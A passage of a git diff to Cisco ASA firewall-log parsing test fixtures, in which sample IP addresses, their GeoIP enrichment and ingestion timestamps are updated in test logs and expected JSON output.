Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:33:30.616213100Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713905", "kind": "event", "action": "error", @@ -5792,7 +5714,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-10-11T11:44:17.555538Z", + "ingested": "2021-12-09T13:33:30.616217500Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!", "code": "713904", "kind": "event", @@ -5837,8 +5759,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555541600Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:33:30.616222200Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713903", "kind": "event", "action": "firewall-rule", @@ -5881,7 +5803,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-10-11T11:44:17.555546900Z", + "ingested": "2021-12-09T13:33:30.616226700Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!", "code": "713902", "kind": "event", @@ -5907,17 +5829,8 @@ "level": "informational" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5937,7 +5850,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { @@ -5946,8 +5859,8 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-10-11T11:44:17.555552500Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:33:30.616230700Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713901", "kind": "event", "action": "error", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log index 80efe8a5553..a3745b40968 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log @@ -8,4 +8,4 @@ Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.2 Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -> inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f] Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\username) -> inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f] Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -> inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3] -Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -> outside/1.2.33.40(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3] +Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -> outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3] diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index e062c89adee..bf923419738 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:54:58.682040900Z", + "ingested": "2021-12-09T13:33:40.267545800Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:54:58.682051600Z", + "ingested": "2021-12-09T13:33:40.267555200Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:54:58.682058800Z", + "ingested": "2021-12-09T13:33:40.267561100Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:54:58.682065600Z", + "ingested": "2021-12-09T13:33:40.267566800Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-06T20:54:58.682072300Z", + "ingested": "2021-12-09T13:33:40.267572500Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", @@ -401,7 +401,7 @@ }, "event": { "severity": 3, - "ingested": "2021-10-06T20:54:58.682079100Z", + "ingested": "2021-12-09T13:33:40.267578400Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-3-313008: Denied IPv6-ICMP type=134, code=0 from fe80::1ff:fe23:4567:890a on interface ISP1", "code": "313008", "kind": "event", @@ -471,7 +471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:54:58.682085900Z", + "ingested": "2021-12-09T13:33:40.267584100Z", "original": "Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.255.0.206/8795 (10.255.0.206/8795) to identity:10.12.31.51/0 (10.12.31.51/0), ICMP id 295, ICMP type 8", "code": "313009", "kind": "event", @@ -545,7 +545,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:54:58.682092600Z", + "ingested": "2021-12-09T13:33:40.267589800Z", "original": "Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -615,7 +615,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:54:58.682099300Z", + "ingested": "2021-12-09T13:33:40.267609700Z", "original": "Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\\\username) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -688,7 +688,7 @@ }, "event": { "severity": 3, - "ingested": "2021-10-06T20:54:58.682106Z", + "ingested": "2021-12-09T13:33:40.267615100Z", "original": "Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -\u003e inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106102", "kind": "event", @@ -720,19 +720,26 @@ }, "destination": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-GD", - "country_name": "China", - "region_name": "Guangdong", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 113.25, - "lat": 23.1167 - }, - "country_iso_code": "CN" + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } }, - "address": "1.2.33.40", + "address": "81.2.69.144", "port": 8080, - "ip": "1.2.33.40" + "ip": "81.2.69.144" }, "source": { "port": 64321, @@ -771,13 +778,13 @@ ], "ip": [ "10.1.2.3", - "1.2.33.40" + "81.2.69.144" ] }, "event": { "severity": 1, - "ingested": "2021-10-06T20:54:58.682112600Z", - "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/1.2.33.40(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", + "ingested": "2021-12-09T13:33:40.267620400Z", + "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106103", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log index 8e53e5f2d89..f73d90c2c38 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log @@ -1,5 +1,5 @@ -Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 234.56.12.87, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested -Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 234.28.45.42, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout +Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 67.43.156.12, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested +Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 67.43.156.12, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout Oct 20 2019 15:42:54: %ASA-4-722037: Group User IP <83.212.241.149> SVC closing connection: DPD failure. Aug 6 2020 11:01:37: %ASA-4-722037: Group User IP <234.63.56.32> SVC closing connection: Transport closing. -Aug 6 2020 11:01:38: %ASA-4-722051: Group User IP <234.24.156.94> IPv4 Address <234.56.47.98> IPv6 address <::> assigned to session +Aug 6 2020 11:01:38: %ASA-4-722051: Group User IP <67.43.156.12> IPv4 Address <67.43.156.12> IPv6 address <::> assigned to session diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json index 9986bf8056b..d976934cd30 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json @@ -6,8 +6,8 @@ }, "destination": { "bytes": 0, - "address": "234.56.12.87", - "ip": "234.56.12.87" + "address": "67.43.156.12", + "ip": "67.43.156.12" }, "source": { "user": { @@ -35,15 +35,15 @@ "Ringo" ], "ip": [ - "234.56.12.87" + "67.43.156.12" ] }, "event": { "severity": 4, "duration": 112000000000, "reason": "User Requested", - "ingested": "2021-10-11T11:16:23.841932100Z", - "original": "Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 234.56.12.87, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested", + "ingested": "2021-12-09T13:33:41.556907800Z", + "original": "Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 67.43.156.12, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested", "code": "113019", "kind": "event", "start": "2020-06-08T12:58:05.000Z", @@ -68,8 +68,8 @@ }, "destination": { "bytes": 43252324, - "address": "234.28.45.42", - "ip": "234.28.45.42" + "address": "67.43.156.12", + "ip": "67.43.156.12" }, "source": { "user": { @@ -97,15 +97,15 @@ "John" ], "ip": [ - "234.28.45.42" + "67.43.156.12" ] }, "event": { "severity": 4, "duration": 8854000000000, "reason": "Idle Timeout", - "ingested": "2021-10-11T11:16:23.841946100Z", - "original": "Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 234.28.45.42, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout", + "ingested": "2021-12-09T13:33:41.556916700Z", + "original": "Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 67.43.156.12, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout", "code": "113019", "kind": "event", "start": "2019-10-20T13:15:19.000Z", @@ -139,7 +139,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:16:23.841954400Z", + "ingested": "2021-12-09T13:33:41.556922600Z", "original": "Oct 20 2019 15:42:54: %ASA-4-722037: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cPaul\u003e IP \u003c83.212.241.149\u003e SVC closing connection: DPD failure.", "code": "722037", "kind": "event", @@ -173,7 +173,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:16:23.841961900Z", + "ingested": "2021-12-09T13:33:41.556928400Z", "original": "Aug 6 2020 11:01:37: %ASA-4-722037: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cBrian\u003e IP \u003c234.63.56.32\u003e SVC closing connection: Transport closing.", "code": "722037", "kind": "event", @@ -207,7 +207,7 @@ "George" ], "ip": [ - "234.24.156.94" + "67.43.156.12" ] }, "log": { @@ -217,13 +217,13 @@ "user": { "name": "George" }, - "address": "234.24.156.94", - "ip": "234.24.156.94" + "address": "67.43.156.12", + "ip": "67.43.156.12" }, "event": { "severity": 4, - "ingested": "2021-10-11T11:16:23.841969400Z", - "original": "Aug 6 2020 11:01:38: %ASA-4-722051: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cGeorge\u003e IP \u003c234.24.156.94\u003e IPv4 Address \u003c234.56.47.98\u003e IPv6 address \u003c::\u003e assigned to session", + "ingested": "2021-12-09T13:33:41.556934300Z", + "original": "Aug 6 2020 11:01:38: %ASA-4-722051: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cGeorge\u003e IP \u003c67.43.156.12\u003e IPv4 Address \u003c67.43.156.12\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", "action": "firewall-rule", @@ -239,7 +239,7 @@ "webvpn": { "group_name": "GroupPolicy_TheBeatles" }, - "assigned_ip": "234.56.47.98" + "assigned_ip": "67.43.156.12" } }, "tags": [ diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log index 9f0a0b8b598..5d21ffa5a9f 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log @@ -1,268 +1,268 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 